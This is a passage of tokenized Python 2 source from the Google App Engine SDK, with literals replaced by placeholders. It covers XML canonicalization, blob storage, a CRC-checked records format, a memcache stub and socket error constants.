] <EOL> other_attrs . sort ( _sorter ) <EOL> for a in other_attrs : <EOL> self . _do_attr ( a . nodeName , a . value ) <EOL> W ( '<STR_LIT:>>' ) <EOL> state , self . state = self . state , ( ns_local , ns_rendered , xml_attrs ) <EOL> for c in _children ( node ) : <EOL> _implementation . handlers [ c . nodeType ] ( self , c ) <EOL> self . 
state = state <EOL> if name : W ( '<STR_LIT>' % name ) <EOL> handlers [ Node . ELEMENT_NODE ] = _do_element <EOL> def Canonicalize ( node , output = None , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> if output : <EOL> if _implementation2 is None : <EOL> _implementation ( node , output . write , ** kw ) <EOL> else : <EOL> apply ( _implementation2 , ( node , output . write ) , kw ) <EOL> else : <EOL> s = StringIO . StringIO ( ) <EOL> if _implementation2 is None : <EOL> _implementation ( node , s . write , ** kw ) <EOL> else : <EOL> apply ( _implementation2 , ( node , s . write ) , kw ) <EOL> return s . getvalue ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : print _copyright </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext . blobstore . blobstore import BlobReader <EOL> from google . appengine . api import blobstore <EOL> from google . appengine . api . blobstore import blobstore_stub <EOL> from google . appengine . api import datastore <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . runtime import apiproxy_errors <EOL> from google . appengine . api . blobstore import blobstore_service_pb <EOL> __all__ = [ '<STR_LIT>' ] <EOL> _BLOB_CHUNK_KIND_ = "<STR_LIT>" <EOL> class DatastoreBlobStorage ( blobstore_stub . BlobStorage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app_id ) : <EOL> """<STR_LIT>""" <EOL> self . _app_id = app_id <EOL> @ classmethod <EOL> def _BlobKey ( cls , blob_key ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( blob_key , blobstore . BlobKey ) : <EOL> return blobstore . BlobKey ( unicode ( blob_key ) ) <EOL> return blob_key <EOL> def StoreBlob ( self , blob_key , blob_stream ) : <EOL> """<STR_LIT>""" <EOL> block_count = <NUM_LIT:0> <EOL> blob_key_object = self . _BlobKey ( blob_key ) <EOL> while True : <EOL> block = blob_stream . read ( blobstore . MAX_BLOB_FETCH_SIZE ) <EOL> if not block : <EOL> break <EOL> entity = datastore . Entity ( _BLOB_CHUNK_KIND_ , <EOL> name = str ( blob_key_object ) + "<STR_LIT>" + str ( block_count ) , <EOL> namespace = '<STR_LIT>' ) <EOL> entity . update ( { '<STR_LIT>' : datastore_types . Blob ( block ) } ) <EOL> datastore . Put ( entity ) <EOL> block_count += <NUM_LIT:1> <EOL> def OpenBlob ( self , blob_key ) : <EOL> """<STR_LIT>""" <EOL> return BlobReader ( blob_key , blobstore . MAX_BLOB_FETCH_SIZE , <NUM_LIT:0> ) <EOL> def DeleteBlob ( self , blob_key ) : <EOL> """<STR_LIT>""" <EOL> blob_info_key = datastore . Key . from_path ( blobstore . BLOB_INFO_KIND , <EOL> str ( blob_key ) , <EOL> namespace = '<STR_LIT>' ) <EOL> try : <EOL> blob_info = datastore . 
Get ( blob_info_key ) <EOL> except datastore_errors . EntityNotFoundError : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> blobstore_service_pb . BlobstoreServiceError . BLOB_NOT_FOUND ) <EOL> block_count = blob_info [ "<STR_LIT:size>" ] / blobstore . MAX_BLOB_FETCH_SIZE <EOL> block_set = [ ] <EOL> try : <EOL> while block_count >= <NUM_LIT:0> : <EOL> entity = datastore . Entity ( _BLOB_CHUNK_KIND_ , <EOL> name = str ( blob_key ) + "<STR_LIT>" + str ( block_count ) , <EOL> namespace = '<STR_LIT>' ) <EOL> block_set . append ( entity ) <EOL> block_count -= <NUM_LIT:1> <EOL> datastore . Delete ( block_set ) <EOL> datastore . Delete ( blob_info_key ) <EOL> except : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> blobstore_service_pb . BlobstoreServiceError . BLOB_NOT_FOUND ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import struct <EOL> import google <EOL> from google . appengine . api . files import crc32c <EOL> BLOCK_SIZE = <NUM_LIT:32> * <NUM_LIT> <EOL> HEADER_FORMAT = '<STR_LIT>' <EOL> HEADER_LENGTH = struct . calcsize ( HEADER_FORMAT ) <EOL> RECORD_TYPE_NONE = <NUM_LIT:0> <EOL> RECORD_TYPE_FULL = <NUM_LIT:1> <EOL> RECORD_TYPE_FIRST = <NUM_LIT:2> <EOL> RECORD_TYPE_MIDDLE = <NUM_LIT:3> <EOL> RECORD_TYPE_LAST = <NUM_LIT:4> <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class InvalidRecordError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class FileWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class FileReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def read ( self , size ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def tell ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> _CRC_MASK_DELTA = <NUM_LIT> <EOL> def _mask_crc ( crc ) : <EOL> """<STR_LIT>""" <EOL> return ( ( ( crc >> <NUM_LIT:15> ) | ( crc << <NUM_LIT> ) ) + _CRC_MASK_DELTA ) & <NUM_LIT> L <EOL> def _unmask_crc ( masked_crc ) : <EOL> """<STR_LIT>""" <EOL> rot = ( masked_crc - _CRC_MASK_DELTA ) & <NUM_LIT> L <EOL> return ( ( rot >> <NUM_LIT> ) | ( rot << <NUM_LIT:15> ) ) & <NUM_LIT> L <EOL> class RecordsWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , writer , _pad_last_block = True ) : <EOL> """<STR_LIT>""" <EOL> self . __writer = writer <EOL> self . __position = <NUM_LIT:0> <EOL> self . __entered = False <EOL> self . __pad_last_block = _pad_last_block <EOL> def __write_record ( self , record_type , data ) : <EOL> """<STR_LIT>""" <EOL> length = len ( data ) <EOL> crc = crc32c . crc_update ( crc32c . CRC_INIT , [ record_type ] ) <EOL> crc = crc32c . crc_update ( crc , data ) <EOL> crc = crc32c . crc_finalize ( crc ) <EOL> self . __writer . write ( <EOL> struct . 
pack ( HEADER_FORMAT , _mask_crc ( crc ) , length , record_type ) ) <EOL> self . __writer . write ( data ) <EOL> self . __position += HEADER_LENGTH + length <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if not self . __entered : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> block_remaining = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if block_remaining < HEADER_LENGTH : <EOL> self . __writer . write ( '<STR_LIT:\x00>' * block_remaining ) <EOL> self . __position += block_remaining <EOL> block_remaining = BLOCK_SIZE <EOL> if block_remaining < len ( data ) + HEADER_LENGTH : <EOL> first_chunk = data [ : block_remaining - HEADER_LENGTH ] <EOL> self . __write_record ( RECORD_TYPE_FIRST , first_chunk ) <EOL> data = data [ len ( first_chunk ) : ] <EOL> while True : <EOL> block_remaining = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if block_remaining >= len ( data ) + HEADER_LENGTH : <EOL> self . __write_record ( RECORD_TYPE_LAST , data ) <EOL> break <EOL> else : <EOL> chunk = data [ : block_remaining - HEADER_LENGTH ] <EOL> self . __write_record ( RECORD_TYPE_MIDDLE , chunk ) <EOL> data = data [ len ( chunk ) : ] <EOL> else : <EOL> self . __write_record ( RECORD_TYPE_FULL , data ) <EOL> def __enter__ ( self ) : <EOL> self . __entered = True <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . __pad_last_block : <EOL> pad_length = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if pad_length and pad_length != BLOCK_SIZE : <EOL> self . __writer . write ( '<STR_LIT:\x00>' * pad_length ) <EOL> class RecordsReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reader ) : <EOL> self . __reader = reader <EOL> def __try_read_record ( self ) : <EOL> """<STR_LIT>""" <EOL> block_remaining = BLOCK_SIZE - self . __reader . 
tell ( ) % BLOCK_SIZE <EOL> if block_remaining < HEADER_LENGTH : <EOL> return ( '<STR_LIT>' , RECORD_TYPE_NONE ) <EOL> header = self . __reader . read ( HEADER_LENGTH ) <EOL> if len ( header ) != HEADER_LENGTH : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( len ( header ) , HEADER_LENGTH ) ) <EOL> ( masked_crc , length , record_type ) = struct . unpack ( HEADER_FORMAT , header ) <EOL> crc = _unmask_crc ( masked_crc ) <EOL> if length + HEADER_LENGTH > block_remaining : <EOL> raise InvalidRecordError ( '<STR_LIT>' ) <EOL> data = self . __reader . read ( length ) <EOL> if len ( data ) != length : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( length , len ( data ) ) ) <EOL> if record_type == RECORD_TYPE_NONE : <EOL> return ( '<STR_LIT>' , record_type ) <EOL> actual_crc = crc32c . crc_update ( crc32c . CRC_INIT , [ record_type ] ) <EOL> actual_crc = crc32c . crc_update ( actual_crc , data ) <EOL> actual_crc = crc32c . crc_finalize ( actual_crc ) <EOL> if actual_crc != crc : <EOL> raise InvalidRecordError ( '<STR_LIT>' ) <EOL> return ( data , record_type ) <EOL> def __sync ( self ) : <EOL> """<STR_LIT>""" <EOL> pad_length = BLOCK_SIZE - self . __reader . tell ( ) % BLOCK_SIZE <EOL> if pad_length and pad_length != BLOCK_SIZE : <EOL> data = self . __reader . read ( pad_length ) <EOL> if len ( data ) != pad_length : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( len ( data ) , pad_length ) ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> data = None <EOL> while True : <EOL> last_offset = self . tell ( ) <EOL> try : <EOL> ( chunk , record_type ) = self . __try_read_record ( ) <EOL> if record_type == RECORD_TYPE_NONE : <EOL> self . __sync ( ) <EOL> elif record_type == RECORD_TYPE_FULL : <EOL> if data is not None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> return chunk <EOL> elif record_type == RECORD_TYPE_FIRST : <EOL> if data is not None : <EOL> logging . 
warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> data = chunk <EOL> elif record_type == RECORD_TYPE_MIDDLE : <EOL> if data is None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> else : <EOL> data += chunk <EOL> elif record_type == RECORD_TYPE_LAST : <EOL> if data is None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> else : <EOL> result = data + chunk <EOL> data = None <EOL> return result <EOL> else : <EOL> raise InvalidRecordError ( "<STR_LIT>" % record_type ) <EOL> except InvalidRecordError , e : <EOL> logging . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset , e ) <EOL> data = None <EOL> self . __sync ( ) <EOL> def __iter__ ( self ) : <EOL> try : <EOL> while True : <EOL> yield self . read ( ) <EOL> except EOFError : <EOL> pass <EOL> def tell ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __reader . tell ( ) <EOL> def seek ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . __reader . seek ( * args , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> from google . appengine . api import apiproxy_stub <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api . memcache import memcache_service_pb <EOL> from google . appengine . runtime import apiproxy_errors <EOL> MemcacheSetResponse = memcache_service_pb . MemcacheSetResponse <EOL> MemcacheSetRequest = memcache_service_pb . MemcacheSetRequest <EOL> MemcacheIncrementRequest = memcache_service_pb . MemcacheIncrementRequest <EOL> MemcacheIncrementResponse = memcache_service_pb . MemcacheIncrementResponse <EOL> MemcacheDeleteResponse = memcache_service_pb . MemcacheDeleteResponse <EOL> MAX_REQUEST_SIZE = <NUM_LIT:32> << <NUM_LIT:20> <EOL> class CacheEntry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , expiration , flags , cas_id , gettime ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( value , basestring ) <EOL> assert len ( value ) <= memcache . MAX_VALUE_SIZE <EOL> assert isinstance ( expiration , ( int , long ) ) <EOL> self . _gettime = gettime <EOL> self . value = value <EOL> self . flags = flags <EOL> self . cas_id = cas_id <EOL> self . created_time = self . _gettime ( ) <EOL> self . will_expire = expiration != <NUM_LIT:0> <EOL> self . locked = False <EOL> self . _SetExpiration ( expiration ) <EOL> def _SetExpiration ( self , expiration ) : <EOL> """<STR_LIT>""" <EOL> if expiration > ( <NUM_LIT> * <NUM_LIT:30> ) : <EOL> self . expiration_time = expiration <EOL> else : <EOL> self . expiration_time = self . _gettime ( ) + expiration <EOL> def CheckExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . will_expire and self . _gettime ( ) >= self . expiration_time <EOL> def ExpireAndLock ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . will_expire = True <EOL> self . locked = True <EOL> self . _SetExpiration ( timeout ) <EOL> def CheckLocked ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . locked and not self . 
CheckExpired ( ) <EOL> class MemcacheServiceStub ( apiproxy_stub . APIProxyStub ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , gettime = time . time , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( MemcacheServiceStub , self ) . __init__ ( service_name , <EOL> max_request_size = MAX_REQUEST_SIZE ) <EOL> self . _next_cas_id = <NUM_LIT:1> <EOL> self . _gettime = lambda : int ( gettime ( ) ) <EOL> self . _ResetStats ( ) <EOL> self . _the_cache = { } <EOL> def _ResetStats ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _hits = <NUM_LIT:0> <EOL> self . _misses = <NUM_LIT:0> <EOL> self . _byte_hits = <NUM_LIT:0> <EOL> self . _cache_creation_time = self . _gettime ( ) <EOL> def _GetKey ( self , namespace , key ) : <EOL> """<STR_LIT>""" <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return None <EOL> entry = namespace_dict . get ( key , None ) <EOL> if entry is None : <EOL> return None <EOL> elif entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> return None <EOL> else : <EOL> return entry <EOL> def _Dynamic_Get ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> keys = set ( request . key_list ( ) ) <EOL> for key in keys : <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None or entry . CheckLocked ( ) : <EOL> self . _misses += <NUM_LIT:1> <EOL> continue <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> item = response . add_item ( ) <EOL> item . set_key ( key ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> if request . for_cas ( ) : <EOL> item . set_cas_id ( entry . cas_id ) <EOL> def _Dynamic_Set ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> set_policy = item . 
set_policy ( ) <EOL> old_entry = self . _GetKey ( namespace , key ) <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> if ( ( set_policy == MemcacheSetRequest . SET ) or <EOL> ( set_policy == MemcacheSetRequest . ADD and old_entry is None ) or <EOL> ( set_policy == MemcacheSetRequest . REPLACE and old_entry is not None ) ) : <EOL> if ( old_entry is None or <EOL> set_policy == MemcacheSetRequest . SET <EOL> or not old_entry . CheckLocked ( ) ) : <EOL> set_status = MemcacheSetResponse . STORED <EOL> elif ( set_policy == MemcacheSetRequest . CAS and item . for_cas ( ) and <EOL> item . has_cas_id ( ) ) : <EOL> if old_entry is None or old_entry . CheckLocked ( ) : <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> elif old_entry . cas_id != item . cas_id ( ) : <EOL> set_status = MemcacheSetResponse . EXISTS <EOL> else : <EOL> set_status = MemcacheSetResponse . STORED <EOL> if set_status == MemcacheSetResponse . STORED : <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( item . value ( ) , <EOL> item . expiration_time ( ) , <EOL> item . flags ( ) , <EOL> self . _next_cas_id , <EOL> gettime = self . _gettime ) <EOL> self . _next_cas_id += <NUM_LIT:1> <EOL> response . add_set_status ( set_status ) <EOL> def _Dynamic_Delete ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> delete_status = MemcacheDeleteResponse . DELETED <EOL> if entry is None : <EOL> delete_status = MemcacheDeleteResponse . NOT_FOUND <EOL> elif item . delete_time ( ) == <NUM_LIT:0> : <EOL> del self . _the_cache [ namespace ] [ key ] <EOL> else : <EOL> entry . ExpireAndLock ( item . delete_time ( ) ) <EOL> response . 
add_delete_status ( delete_status ) <EOL> def _internal_increment ( self , namespace , request ) : <EOL> """<STR_LIT>""" <EOL> key = request . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None : <EOL> if not request . has_initial_value ( ) : <EOL> return None <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> flags = <NUM_LIT:0> <EOL> if request . has_initial_flags ( ) : <EOL> flags = request . initial_flags ( ) <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( str ( request . initial_value ( ) ) , <EOL> expiration = <NUM_LIT:0> , <EOL> flags = flags , <EOL> cas_id = self . _next_cas_id , <EOL> gettime = self . _gettime ) <EOL> self . _next_cas_id += <NUM_LIT:1> <EOL> entry = self . _GetKey ( namespace , key ) <EOL> assert entry is not None <EOL> try : <EOL> old_value = long ( entry . value ) <EOL> if old_value < <NUM_LIT:0> : <EOL> raise ValueError <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , key ) <EOL> return None <EOL> delta = request . delta ( ) <EOL> if request . direction ( ) == MemcacheIncrementRequest . DECREMENT : <EOL> delta = - delta <EOL> new_value = max ( old_value + delta , <NUM_LIT:0> ) % ( <NUM_LIT:2> ** <NUM_LIT:64> ) <EOL> entry . value = str ( new_value ) <EOL> return new_value <EOL> def _Dynamic_Increment ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> new_value = self . _internal_increment ( namespace , request ) <EOL> if new_value is None : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> memcache_service_pb . MemcacheServiceError . UNSPECIFIED_ERROR ) <EOL> response . set_new_value ( new_value ) <EOL> def _Dynamic_BatchIncrement ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for request_item in request . item_list ( ) : <EOL> new_value = self . 
_internal_increment ( namespace , request_item ) <EOL> item = response . add_item ( ) <EOL> if new_value is None : <EOL> item . set_increment_status ( MemcacheIncrementResponse . NOT_CHANGED ) <EOL> else : <EOL> item . set_increment_status ( MemcacheIncrementResponse . OK ) <EOL> item . set_new_value ( new_value ) <EOL> def _Dynamic_FlushAll ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> self . _the_cache . clear ( ) <EOL> self . _ResetStats ( ) <EOL> def _Dynamic_Stats ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> stats = response . mutable_stats ( ) <EOL> stats . set_hits ( self . _hits ) <EOL> stats . set_misses ( self . _misses ) <EOL> stats . set_byte_hits ( self . _byte_hits ) <EOL> items = <NUM_LIT:0> <EOL> total_bytes = <NUM_LIT:0> <EOL> for namespace in self . _the_cache . itervalues ( ) : <EOL> items += len ( namespace ) <EOL> for entry in namespace . itervalues ( ) : <EOL> total_bytes += len ( entry . value ) <EOL> stats . set_items ( items ) <EOL> stats . set_bytes ( total_bytes ) <EOL> stats . set_oldest_item_age ( self . _gettime ( ) - self . _cache_creation_time ) </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class RemoteSocketServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> SYSTEM_ERROR = <NUM_LIT:1> <EOL> GAI_ERROR = <NUM_LIT:2> <EOL> SSL_ERROR = <NUM_LIT:3> <EOL> FAILURE = <NUM_LIT:4> <EOL> PERMISSION_DENIED = <NUM_LIT:5> <EOL> INVALID_REQUEST = <NUM_LIT:6> <EOL> SOCKET_CLOSED = <NUM_LIT:7> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . 
get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> SYS_SUCCESS = <NUM_LIT:0> <EOL> SYS_EPERM = <NUM_LIT:1> <EOL> SYS_ENOENT = <NUM_LIT:2> <EOL> SYS_ESRCH = <NUM_LIT:3> <EOL> SYS_EINTR = <NUM_LIT:4> <EOL> SYS_EIO = <NUM_LIT:5> <EOL> SYS_ENXIO = <NUM_LIT:6> <EOL> SYS_E2BIG = <NUM_LIT:7> <EOL> SYS_ENOEXEC = <NUM_LIT:8> <EOL> SYS_EBADF = <NUM_LIT:9> <EOL> SYS_ECHILD = <NUM_LIT:10> <EOL> SYS_EAGAIN = <NUM_LIT:11> <EOL> SYS_EWOULDBLOCK = <NUM_LIT:11> <EOL> SYS_ENOMEM = <NUM_LIT:12> <EOL> SYS_EACCES = <NUM_LIT> <EOL> SYS_EFAULT = <NUM_LIT> <EOL> SYS_ENOTBLK = <NUM_LIT:15> <EOL> SYS_EBUSY = <NUM_LIT:16> <EOL> SYS_EEXIST = <NUM_LIT> <EOL> SYS_EXDEV = <NUM_LIT> <EOL> SYS_ENODEV = <NUM_LIT> <EOL> SYS_ENOTDIR = <NUM_LIT:20> <EOL> SYS_EISDIR = <NUM_LIT> <EOL> SYS_EINVAL = <NUM_LIT> <EOL> SYS_ENFILE = <NUM_LIT> <EOL> SYS_EMFILE = <NUM_LIT> <EOL> SYS_ENOTTY = <NUM_LIT> <EOL> SYS_ETXTBSY = <NUM_LIT> <EOL> SYS_EFBIG = <NUM_LIT> <EOL> SYS_ENOSPC = <NUM_LIT> <EOL> SYS_ESPIPE = <NUM_LIT> <EOL> SYS_EROFS = <NUM_LIT:30> <EOL> SYS_EMLINK = <NUM_LIT> <EOL> SYS_EPIPE = <NUM_LIT:32> <EOL> SYS_EDOM = <NUM_LIT> <EOL> SYS_ERANGE = <NUM_LIT> <EOL> SYS_EDEADLK = <NUM_LIT> <EOL> SYS_EDEADLOCK = <NUM_LIT> <EOL> SYS_ENAMETOOLONG = <NUM_LIT> <EOL> SYS_ENOLCK = <NUM_LIT> <EOL> SYS_ENOSYS = <NUM_LIT> <EOL> SYS_ENOTEMPTY = <NUM_LIT> <EOL> SYS_ELOOP = <NUM_LIT> <EOL> SYS_ENOMSG = <NUM_LIT> <EOL> SYS_EIDRM = <NUM_LIT> <EOL> SYS_ECHRNG = <NUM_LIT> <EOL> SYS_EL2NSYNC = <NUM_LIT> <EOL> SYS_EL3HLT = <NUM_LIT> <EOL> SYS_EL3RST = <NUM_LIT> <EOL> SYS_ELNRNG = <NUM_LIT> <EOL> SYS_EUNATCH = <NUM_LIT> <EOL> SYS_ENOCSI = <NUM_LIT:50> <EOL> SYS_EL2HLT = <NUM_LIT> <EOL> SYS_EBADE = <NUM_LIT> <EOL> SYS_EBADR = <NUM_LIT> <EOL> SYS_EXFULL = <NUM_LIT> <EOL> SYS_ENOANO = <NUM_LIT> <EOL> SYS_EBADRQC = <NUM_LIT> <EOL> SYS_EBADSLT = <NUM_LIT> <EOL> SYS_EBFONT = <NUM_LIT> <EOL> SYS_ENOSTR = <NUM_LIT> <EOL> SYS_ENODATA = <NUM_LIT> <EOL> SYS_ETIME = <NUM_LIT> <EOL> SYS_ENOSR = <NUM_LIT> <EOL> 
SYS_ENONET = <NUM_LIT:64> <EOL> SYS_ENOPKG = <NUM_LIT> <EOL> SYS_EREMOTE = <NUM_LIT> <EOL> SYS_ENOLINK = <NUM_LIT> <EOL> SYS_EADV = <NUM_LIT> <EOL> SYS_ESRMNT = <NUM_LIT> <EOL> SYS_ECOMM = <NUM_LIT> <EOL> SYS_EPROTO = <NUM_LIT> <EOL> SYS_EMULTIHOP = <NUM_LIT> <EOL> SYS_EDOTDOT = <NUM_LIT> <EOL> SYS_EBADMSG = <NUM_LIT> <EOL> SYS_EOVERFLOW = <NUM_LIT> <EOL> SYS_ENOTUNIQ = <NUM_LIT> <EOL> SYS_EBADFD = <NUM_LIT> <EOL> SYS_EREMCHG = <NUM_LIT> <EOL> SYS_ELIBACC = <NUM_LIT> <EOL> SYS_ELIBBAD = <NUM_LIT> <EOL> SYS_ELIBSCN = <NUM_LIT> <EOL> SYS_ELIBMAX = <NUM_LIT> <EOL> SYS_ELIBEXEC = <NUM_LIT> <EOL> SYS_EILSEQ = <NUM_LIT> <EOL> SYS_ERESTART = <NUM_LIT> <EOL> SYS_ESTRPIPE = <NUM_LIT> <EOL> SYS_EUSERS = <NUM_LIT> <EOL> SYS_ENOTSOCK = <NUM_LIT> <EOL> SYS_EDESTADDRREQ = <NUM_LIT> <EOL> SYS_EMSGSIZE = <NUM_LIT> <EOL> SYS_EPROTOTYPE = <NUM_LIT> <EOL> SYS_ENOPROTOOPT = <NUM_LIT> <EOL> SYS_EPROTONOSUPPORT = <NUM_LIT> <EOL> SYS_ESOCKTNOSUPPORT = <NUM_LIT> <EOL> SYS_EOPNOTSUPP = <NUM_LIT> <EOL> SYS_ENOTSUP = <NUM_LIT> <EOL> SYS_EPFNOSUPPORT = <NUM_LIT> <EOL> SYS_EAFNOSUPPORT = <NUM_LIT> <EOL> SYS_EADDRINUSE = <NUM_LIT> <EOL> SYS_EADDRNOTAVAIL = <NUM_LIT> <EOL> SYS_ENETDOWN = <NUM_LIT:100> <EOL> SYS_ENETUNREACH = <NUM_LIT> <EOL> SYS_ENETRESET = <NUM_LIT> <EOL> SYS_ECONNABORTED = <NUM_LIT> <EOL> SYS_ECONNRESET = <NUM_LIT> <EOL> SYS_ENOBUFS = <NUM_LIT> <EOL> SYS_EISCONN = <NUM_LIT> <EOL> SYS_ENOTCONN = <NUM_LIT> <EOL> SYS_ESHUTDOWN = <NUM_LIT> <EOL> SYS_ETOOMANYREFS = <NUM_LIT> <EOL> SYS_ETIMEDOUT = <NUM_LIT> <EOL> SYS_ECONNREFUSED = <NUM_LIT> <EOL> SYS_EHOSTDOWN = <NUM_LIT> <EOL> SYS_EHOSTUNREACH = <NUM_LIT> <EOL> SYS_EALREADY = <NUM_LIT> <EOL> SYS_EINPROGRESS = <NUM_LIT> <EOL> SYS_ESTALE = <NUM_LIT> <EOL> SYS_EUCLEAN = <NUM_LIT> <EOL> SYS_ENOTNAM = <NUM_LIT> <EOL> SYS_ENAVAIL = <NUM_LIT> <EOL> SYS_EISNAM = <NUM_LIT> <EOL> SYS_EREMOTEIO = <NUM_LIT> <EOL> SYS_EDQUOT = <NUM_LIT> <EOL> SYS_ENOMEDIUM = <NUM_LIT> <EOL> SYS_EMEDIUMTYPE = <NUM_LIT> <EOL> SYS_ECANCELED = <NUM_LIT> <EOL> 
SYS_ENOKEY = <NUM_LIT> <EOL> SYS_EKEYEXPIRED = <NUM_LIT> <EOL> SYS_EKEYREVOKED = <NUM_LIT> <EOL> SYS_EKEYREJECTED = <NUM_LIT> <EOL> SYS_EOWNERDEAD = <NUM_LIT> <EOL> SYS_ENOTRECOVERABLE = <NUM_LIT> <EOL> SYS_ERFKILL = <NUM_LIT> <EOL> _SystemError_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> 